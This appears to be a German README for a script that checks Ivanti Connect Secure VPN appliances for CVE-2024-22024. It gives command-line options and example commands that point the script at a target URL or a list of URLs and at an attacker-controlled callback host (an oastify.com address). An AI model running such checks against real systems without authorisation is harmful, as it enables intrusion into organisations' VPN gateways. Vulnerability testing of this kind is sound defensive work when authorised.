
Prüfen auf CVE-2024-22024-Sicherheitslücke in Ivanti Connect Secure
Auf CVE-2024-22024-Schwachstelle in Ivanti Connect Secure prüfen
[!WARNING] NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.
-u oder --target_url: Die Ziel-Ivanti-Connect-Secure (ICS)-URL oder eine Datei mit einer Liste von URLs.
-c oder --attacker_url: Die Angreifer-URL (eine erstellen mit Burp Collaborator, ngrok oder einer eindeutigen URL von Webhook.site)
-t oder --timeout: Timeout in Sekunden für die Anfrage (Standard: 3 Sekunden)
Testen einer einzelnen URL:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
Testen einer Liste von URLs:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
Verwendung eines anderen Timeouts (5 Sekunden):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
Wem auch immer die Schwachstelle entdeckt hat … Ich habe nur den PoC gelesen und dies automatisiert.